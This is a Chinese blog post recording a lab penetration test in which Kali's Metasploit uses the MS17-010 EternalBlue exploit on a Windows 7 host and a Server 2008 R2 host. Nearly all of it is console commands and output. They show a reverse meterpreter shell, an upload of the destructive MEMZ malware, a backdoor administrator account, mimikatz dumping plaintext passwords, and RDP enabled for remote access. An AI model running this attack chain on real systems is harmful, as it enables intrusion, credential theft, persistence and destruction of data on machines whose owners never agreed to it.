系统相关
首页 > 系统相关> > 使用Kali系统对Windows7和Server2008R2进行***测试(MS17-010漏洞利用)

使用Kali系统对Windows7和Server2008R2进行***测试(MS17-010漏洞利用)

作者:互联网

使用Kali系统对Windows7和Server 2008R2进行***测试

(MS17-010漏洞利用:上传MEMZ病毒)

 

 

1.   实验环境

测试平台:kali Linux

IP地址 :192.168.8.132

    Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux

靶 机1:Windows 7 Professional SP1 x64

IP地址:192.168.8.133

1.jpg

        靶 机2:Windows 7 Professional SP1 x64

IP地址:192.168.8.8

2.jpg

    扫描端口:对192.168.8.0网段进行端口扫描,发现2台目标主机打开445端口

4.jpg

    本实验网络拓扑图:

3.jpg

2.   实验内容

 2.1  对Windows7进行***测试

root@kali:~# msfconsole                     /*注释    打开metasploit   注释*/

[-] ***rting the Metasploit Framework console...-

[-] * WARNING: No database support: No database YAML file

[-] ***

     ,           ,

    /             \

   ((__---,,,---__))

      (_) O O (_)_________

         \ _ /            |\

          o_o \   M S F   | \

               \   _____  |  *

                |||   WW|||

                |||     |||

       =[ metasploit v5.0.60-dev                          ]

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post       ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

msf5 > search ms17-010      /*注释    搜索永恒之蓝漏洞ms17-010模块   注释*/

 

Matching Modules

================

   #  Name          Disclosure Date  Rank     Check  Description

   -  ----          ---------------  ----     -----  -----------

   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection

   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization

   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

 

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options   /* 显示参数 */

Module options (auxiliary/scanner/smb/smb_ms17_010):

 

   Name                   Current Setting          Required                     Description

   ----                   ---------------        --------                    -----------

   CHECK_ARCH            true                            no        Check for architecture on vulnerable hosts

   CHECK_DOPU            true                              no        Check for DOUBLEPULSAR on vulnerable hosts

   CHECK_PIPE               false                      no        Check for named pipe on vulnerable hosts

    RHOSTS          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT                        445                 yes       The SMB service port (TCP)

   SMBDomain       no        The Windows domain to use for authentication

   SMBPass          no        The password for the specified username

   SMBUser          no        The username to authenticate as

   THREADS                    1                        yes       The number of concurrent threads (max one per host)

 

msf5 > use auxiliary/scanner/smb/smb_ms17_010        /* 使用漏洞扫描模块  */

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

 

[+] 192.168.8.133:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445     - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) >

>use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) >

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 exploit(windows/smb/ms17_010_eternalblue) >

> set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.133:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445 - Connecting to target for exploitation.

[+] 192.168.8.133:445 - Connection established for exploitation.

[+] 192.168.8.133:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.8.133:445 - CORE raw buffer dump (42 bytes)

[*] 192.168.8.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Professional 7601 Service Pack 1

[+] 192.168.8.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[+] 192.168.8.133:445 - Sending SMBv2 buffers

[+] 192.168.8.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.133:445 - Sending final SMBv2 buffers.

[+] 192.168.8.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending stage (206403 bytes) to 192.168.8.133

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.133:49159) at 2020-03-17 01:09:21 -0400

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=--=-WIN-=-=-==-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 

meterpreter >

 

meterpreter > sysinfo

Computer        : TODD-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x64/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > screenshot

Screenshot saved to: /root/ZfhJyFXb.jpeg

meterpreter > lpwd

/root

meterpreter > lls

Listing Local: /root

====================

 

Mode              Size     Type  Last modified              Name

----              ----     ----  -------------              ----

100644/rw-r--r--  2740     fil   2020-03-17 00:19:35 -0400  .bash_history

100644/rw-r--r--  3391     fil   2019-11-25 07:24:30 -0500  .bashrc

40755/rwxr-xr-x   4096     dir   2020-01-17 01:40:32 -0500  .config

40755/rwxr-xr-x   4096     dir   2020-01-10 05:37:10 -0500  .msf4

100644/rw-r--r--  148      fil   2019-11-19 04:18:26 -0500  .profile

100600/rw-------  9825     fil   2020-03-16 22:14:37 -0400  .viminfo

40755/rwxr-xr-x   4096     dir   2020-01-17 02:53:20 -0500  Desktop

40755/rwxr-xr-x   4096     dir   2019-11-25 13:44:09 -0500  Documents

40755/rwxr-xr-x   4096     dir   2019-11-25 13:44:09 -0500  Downloads

100644/rw-r--r--  14848    fil   2016-07-09 20:59:44 -0400  memz.exe

100644/rw-r--r--  2527232  fil   2017-09-23 12:50:28 -0400  永恒之绿.exe

meterpreter > upload memz.exe c:\\

[*] uploading  : memz.exe -> c:\

[*] uploaded   : memz.exe -> c:\\memz.exe

meterpreter > download c:\\haha.txt

[*] Downloading: c:\haha.txt -> haha.txt

[*] Downloaded 8.00 B of 8.00 B (100.0%): c:\haha.txt -> haha.txt

[*] download   : c:\haha.txt -> haha.txt

 

meterpreter > shell

Process 2772 created.

Channel 1 created.

Microsoft Windows [▒汾 6.1.7601]

▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>

 

C:\Windows\system32>chcp 65001

chcp 65001

Active code page: 65001

C:\Windows\system32>cd \

C:\>

C:\>dir

Volume in drive C has no label.

 Volume Serial Number is F496-8A44

 Directory of C:\

 

2020/03/17  13:48                 8 haha.txt

2020/03/17  13:48            14,848 memz.exe

2009/07/14  11:20    <DIR>          PerfLogs

2020/01/10  21:19    <DIR>          Program Files

2020/01/23  14:04    <DIR>          Program Files (x86)

2020/01/10  21:14    <DIR>          Users

2020/01/10  21:16    <DIR>          Windows

               2 File(s)         14,856 bytes

               5 Dir(s)  52,709,482,496 bytes free

 

C:\Windows\system32>net user aa 123456 /add

net user aa 123456 /add

The command completed successfully.

C:\Windows\system32>net user

net user

 

User accounts for \\

---------------------------------------------------------------------------

aa                   Administrator            Guest                                  Todd

The command completed with one or more errors.

 

C:\Windows\system32>net user aa

net user aa

User name                    aa

Full Name

Comment

User's comment

Country code                 000 (System Default)

Account active               Yes

Account expires              Never

 

Password last set            2020/3/17 14:02:43

Password expires             2020/4/28 14:02:43

Password changeable          2020/3/17 14:02:43

Password required            Yes

User may change password     Yes

 

 

Local Group Memberships      *Users

Global Group memberships     *None

The command completed successfully.

C:\Windows\system32>net localgroup administrators aa /add

net localgroup administrators aa /add

The command completed successfully.

 

C:\Windows\system32>net user aa

User name                    aa

Account active               Yes

Account expires              Never

 

Password last set            2020/3/17 14:02:43

Password expires             2020/4/28 14:02:43

Password changeable          2020/3/17 14:02:43

Password required            Yes

 

Local Group Memberships      *Administrators       *Users

Global Group memberships     *None

The command completed successfully.

C:\Windows\system32>exit

exit

meterpreter > load mimikatz

Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?

Success.

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

 

AuthID     Package    Domain        User           Password

------     -------    ------        ----           --------

0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE

0;999      NTLM       WORKGROUP     TODD-PC$

0;2454496  NTLM       Todd-PC       aa             123456

0;293566   NTLM       Todd-PC       Todd           qwert

meterpreter > run post/windows/manage/enable_rdp

 

[*] Enabling Remote Desktop

[*]     RDP is already enabled

[*] Setting Terminal Services service startup mode

[*]     Terminal Services service is already set to auto

[*]     Opening port in local firewall if necessary

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022920_default_192.168.8.133_host.windows.cle_555893.txt

 

或者:

meterpreter > run post/windows/manage/enable_rdp USERNAME=bb PASSWORD=password

 

[*] Enabling Remote Desktop

[*]     RDP is disabled; enabling it ...

[*] Setting Terminal Services service startup mode

[*]     The Terminal Services service is not set to auto, changing it to auto ...

[*]     Opening port in local firewall if necessary

[*] Setting user account for logon

[*]     Adding User: bb with Password: password

[*]     Adding User: bb to local group 'Remote Desktop Users'

[*]     Hiding user from Windows Login screen

[*]     Adding User: bb to local group 'Administrators'

[*] You can now login with the created user

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022750_default_192.168.8.133_host.windows.cle_306010.txt

meterpreter >

 

meterpreter >exit

msf5 exploit(windows/smb/ms17_010_eternalblue) > exit

root@kali:~#

 

2.2  对Windows Server 2008R2进行***测试

root@kali:~# msfconsole

[-] ***rting the Metasploit Framework console.../

[-] * WARNING: No database support: No database YAML file

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post       ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]

+ -- --=[ 7 evasion                                       ]

msf5 >

 

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

 

[+] 192.168.8.8:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445       - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

 

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.8:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445 - Connecting to target for exploitation.

[+] 192.168.8.8:445 - Connection established for exploitation.

 [*] 192.168.8.8:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2008 R2 Enterpris 7601 Service Pack 1

 [+] 192.168.8.8:445 - Sending SMBv2 buffers

[+] 192.168.8.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.8:445 - Sending final SMBv2 buffers.

 [+] 192.168.8.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

 [*] Sending stage (206403 bytes) to 192.168.8.8

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.8:49160) at 2020-03-17 03:11:44 -0400

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-==-WIN-=-=-=--=-=-=-=-=-=-=-=-

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

meterpreter >

 

meterpreter > sysinfo

Computer        : WIN-2F0T37AEMO0

OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x64/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > screenshot

Screenshot saved to: /root/FEbrdmoh.jpeg

meterpreter > load mimikatz

Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?

Success.

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

AuthID    Package    Domain           User              Password

------    -------    ------           ----              --------

0;996     Negotiate  WORKGROUP        WIN-2F0T37AEMO0$

0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE

0;254894  NTLM       WIN-2F0T37AEMO0  Administrator     a1!

 

meterpreter > run post/windows/manage/enable_rdp

 

[*] Enabling Remote Desktop

[*]     RDP is already enabled

[*] Setting Terminal Services service startup mode

[*]     Terminal Services service is already set to auto

[*]     Opening port in local firewall if necessary

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317031353_default_192.168.8.8_host.windows.cle_637762.txt


3.    实验结论

3.1 在kali终端中使用rdesktop远程桌面工具登录靶机:

root@kali:~# rdesktop 192.168.8.133

 

ATTENTION! Found a certificate stored for host '192.168.8.133', but it does not match the certificate

  Certificate fingerprints:

  sha1: cbbee169f5929f8c048c428feb6792fb66ab3446

  sha256: 77dfda959a5f9717c08ecb6a224255f2cda71aa57695616e6c1c38e1f97d36c7

Do you trust this certificate (yes/no)?  yes

5.jpg

 6.jpg

3.2 在Windows 下使用远程桌面登录靶机:

7.jpg

8.jpg

9.jpg

Windows Server 2008 R2

11.jpg

10.jpg

标签:Server2008R2,Windows,Kali,192.168,010,ms17,445,smb
来源: https://blog.51cto.com/toddliu/2479733